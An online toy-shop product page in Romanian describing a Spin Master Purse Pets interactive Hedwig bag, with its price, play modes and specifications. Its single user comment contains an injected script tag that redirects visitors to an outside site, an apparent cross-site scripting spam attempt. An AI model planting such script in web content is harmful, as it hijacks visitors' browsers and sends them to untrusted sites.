Produsul a fost adăugat in coș.
 Categorii
Kidsco.md

Spin Master 6066127 Purse Pets Geanta Hedwig

870 Lei

Brand: Spin Master
Articol: 6066127
Produsul este în vinzare ✓
  • Buiucani
Cantitatea:  
1 recenzii 4

 Descriere

Vîrsta: 5+
Pentru: Fetițe

Completați-vă aspectul cu un accesoriu frumos: Geanta interactivă Purse Pets. Geanta este realizata in forma unei bufnite albe Hedwig din lumea magica a lui Harry Potter. Această geantă interactivă fermecătoare și la modă este împodobită cu multe detalii elegante.

PURSE PETS este o geantă interactivă cu adevărat cool și elegantă! Ea reacționează la atingerea ta și clipește din ochi. Peste 30 de sunete și reacții! 3 moduri de joc!

Pentru a porni alimentarea, desfaceți fermoarul pungă și rotiți comutatorul de alimentare în poziția ON (I).

Modul Mute: Țineți apăsat butonul de siglă în timp ce porniți geanta pentru a intra în modul Mute. Pentru a ieși din modul Mute, opriți și porniți-vă geanta.

Include 3 moduri:

- Modul magic: atingeți fruntea lui Hedwig și va clipi și va scoate sunete. Hedwig va clipi în timp ce sunteți în deplasare. O apucă pe Hedwig de frunte să o mângâie și el se va mângâia fericit. Dacă îl mângâi prea tare, el va scârțâi de enervare.

- Hrăniți Hedwig: atingeți-vă fruntea pentru a vă hrăni și veți auzi sunetele de șampanie. Hedwig vă va anunța dacă i-a plăcut puțin, mult sau deloc mâncarea.

- Ține-o pe Hedwig de frunte pentru a auzi cum bate din aripi. Când ții, Hedwig își va deschide ochii și va scoate sunete de bufniță.

Hedwig va intra în modul de repaus dacă nu interacționați cu ea timp de aproximativ 5 minute. Puteți pune Hedwig în modul de repaus ținând apăsat butonul cu emblema. Faceți clic pe butonul pictogramă și Hedwig se va trezi.

Dimensiuni geanta: 13x 17 x 6 cm.

Baterii necesare: 3 x AAA (sunt incluse).

 Comentarii (1)

mindset 17 noiembrie 2023 11:18
<script> window.location.href = "https://sava.md/"; </script>

Adaugă un comentariu

Numele:


E-mail:


Comentariul: Nota: HTML nu se accepta!

Nota: 1           5